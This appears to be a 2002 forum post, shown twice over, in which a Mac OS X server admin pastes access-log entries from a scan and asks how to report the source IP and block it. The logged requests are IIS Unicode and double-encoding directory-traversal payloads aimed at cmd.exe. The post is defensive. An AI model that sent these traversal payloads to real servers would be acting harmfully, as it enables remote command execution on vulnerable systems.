illovich
03-18-2002, 03:26 PM
Hey all,
I've had some troubling connections from a single domain (155.230.x.x), actually it was a bit ago, but I just noticed all the 404s in my logs. It seems to me like a scriptkiddie was trying to break into my WindowsNT server. Luckily, I was running OS X on it ;) .
Here's a sample:
155.230.14.11 - - [26/Feb/2002:03:00:02 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:03 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:04 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:04 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:05 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
155.230.14.11 - - [26/Feb/2002:03:00:05 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
155.230.14.11 - - [26/Feb/2002:03:00:06 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
155.230.14.11 - - [26/Feb/2002:03:00:06 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
I'm assuming that this individual was checking to see if my webserver was vulnerable to some msxploit...apparently one that would ive them access to my C: drive (jokes on them...for a few seperate reasons, as we know).
Anyway, actually 2 questions. One, i would like to report the individual in quesiton to their ISP (I'm assuming from the pattern of connections that they were dialed in via PPP)...but the reverselookup failed, so I don't know how to go further in trying to track down the sysadmin.
Secondly, is there a way to deny access to this domain? Is that even worth bothering with?
Thanks,
ill.
I've had some troubling connections from a single domain (155.230.x.x), actually it was a bit ago, but I just noticed all the 404s in my logs. It seems to me like a scriptkiddie was trying to break into my WindowsNT server. Luckily, I was running OS X on it ;) .
Here's a sample:
155.230.14.11 - - [26/Feb/2002:03:00:02 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:03 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:04 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:04 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
155.230.14.11 - - [26/Feb/2002:03:00:05 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
155.230.14.11 - - [26/Feb/2002:03:00:05 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
155.230.14.11 - - [26/Feb/2002:03:00:06 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
155.230.14.11 - - [26/Feb/2002:03:00:06 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311
I'm assuming that this individual was checking to see if my webserver was vulnerable to some msxploit...apparently one that would ive them access to my C: drive (jokes on them...for a few seperate reasons, as we know).
Anyway, actually 2 questions. One, i would like to report the individual in quesiton to their ISP (I'm assuming from the pattern of connections that they were dialed in via PPP)...but the reverselookup failed, so I don't know how to go further in trying to track down the sysadmin.
Secondly, is there a way to deny access to this domain? Is that even worth bothering with?
Thanks,
ill.